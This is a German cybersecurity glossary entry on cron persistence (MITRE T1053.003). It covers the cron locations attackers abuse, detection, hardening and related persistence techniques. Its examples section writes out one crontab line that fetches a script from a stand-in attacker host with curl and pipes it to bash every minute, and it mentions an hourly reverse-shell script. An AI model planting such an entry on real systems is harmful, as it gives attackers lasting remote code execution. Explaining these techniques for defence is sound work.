Cron-Persistenz
Was ist Cron-Persistenz?
Cron-PersistenzLinux- und Unix-Persistenztechnik, die cron, anacron oder systemd-Timer nutzt, um Angreifercode in einem gewählten Intervall oder bei einem Systemereignis erneut auszuführen.
Cron-Persistenz (MITRE ATT&CK T1053.003) zielt auf den Unix-Cron-Daemon und seine Varianten (anacron, fcron, systemd-Timer). Angreifer fügen Einträge in /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ oder benutzerspezifische Crontabs (crontab -e) ein. Typische Payloads sind Einzeiler-Reverse-Shells, curl-Downloads oder Skripte in /tmp. Da cron als root oder als zugehöriger Benutzer läuft, ist die Methode nach Erstzugriff zuverlässig und trivial. Detektion: Dateiintegritätsüberwachung der cron-Verzeichnisse, auditd-Watches, Baseline erwarteter Jobs, EDR-Alerts auf von cron gestartete Shells. Härtung: Crontab-Berechtigung beschränken, /tmp mit noexec mounten, systemd-cron-Audit aktivieren.
● Beispiele
- 01
Eintrag * * * * * curl -s http://angreifer/sh | bash in /etc/cron.d/update.
- 02
Skript in /etc/cron.hourly/ legen, das stündlich eine Reverse-Shell neu aufbaut.
● Häufige Fragen
Was ist Cron-Persistenz?
Linux- und Unix-Persistenztechnik, die cron, anacron oder systemd-Timer nutzt, um Angreifercode in einem gewählten Intervall oder bei einem Systemereignis erneut auszuführen. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet Cron-Persistenz?
Linux- und Unix-Persistenztechnik, die cron, anacron oder systemd-Timer nutzt, um Angreifercode in einem gewählten Intervall oder bei einem Systemereignis erneut auszuführen.
Wie funktioniert Cron-Persistenz?
Cron-Persistenz (MITRE ATT&CK T1053.003) zielt auf den Unix-Cron-Daemon und seine Varianten (anacron, fcron, systemd-Timer). Angreifer fügen Einträge in /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ oder benutzerspezifische Crontabs (crontab -e) ein. Typische Payloads sind Einzeiler-Reverse-Shells, curl-Downloads oder Skripte in /tmp. Da cron als root oder als zugehöriger Benutzer läuft, ist die Methode nach Erstzugriff zuverlässig und trivial. Detektion: Dateiintegritätsüberwachung der cron-Verzeichnisse, auditd-Watches, Baseline erwarteter Jobs, EDR-Alerts auf von cron gestartete Shells. Härtung: Crontab-Berechtigung beschränken, /tmp mit noexec mounten, systemd-cron-Audit aktivieren.
Wie schützt man sich gegen Cron-Persistenz?
Schutzmaßnahmen gegen Cron-Persistenz kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für Cron-Persistenz?
Übliche alternative Bezeichnungen: Crontab-Persistenz, Anacron-Persistenz.
● Verwandte Begriffe
- attacks№ 610
LD_PRELOAD-Hijacking
Linux-Persistenz- und Library-Hijacking-Technik, die die Umgebungsvariable LD_PRELOAD oder /etc/ld.so.preload nutzt, um Angreifercode in dynamisch gelinkte Prozesse zu injizieren.
- attacks№ 608
launchd-Persistenz
macOS-Persistenztechnik, die ein LaunchDaemon- oder LaunchAgent-Plist hinterlegt, damit launchd Angreifercode beim Boot, Login oder bei einem Trigger ausführt.
- attacks№ 975
Geplante-Aufgaben-Persistenz
Persistenz- und Ausführungstechnik, bei der ein Angreifer eine Windows-Aufgabenplanungs-Aufgabe anlegt oder ändert, um sein Payload bei Logon, Boot oder Timer auszuführen.
- attacks№ 1246
WMI-Event-Subscription-Persistenz
Persistenztechnik, die einen permanenten WMI-Event-Filter und -Consumer registriert, sodass Angreifercode bei einem definierten Systemereignis ausgeführt wird.
- attacks№ 914
Run-Schlüssel-Persistenz
Klassische Windows-Persistenztechnik, die einen Eintrag unter einem Run- oder RunOnce-Registry-Schlüssel anlegt, damit ein Binary oder Skript bei jedem Logon ausgeführt wird.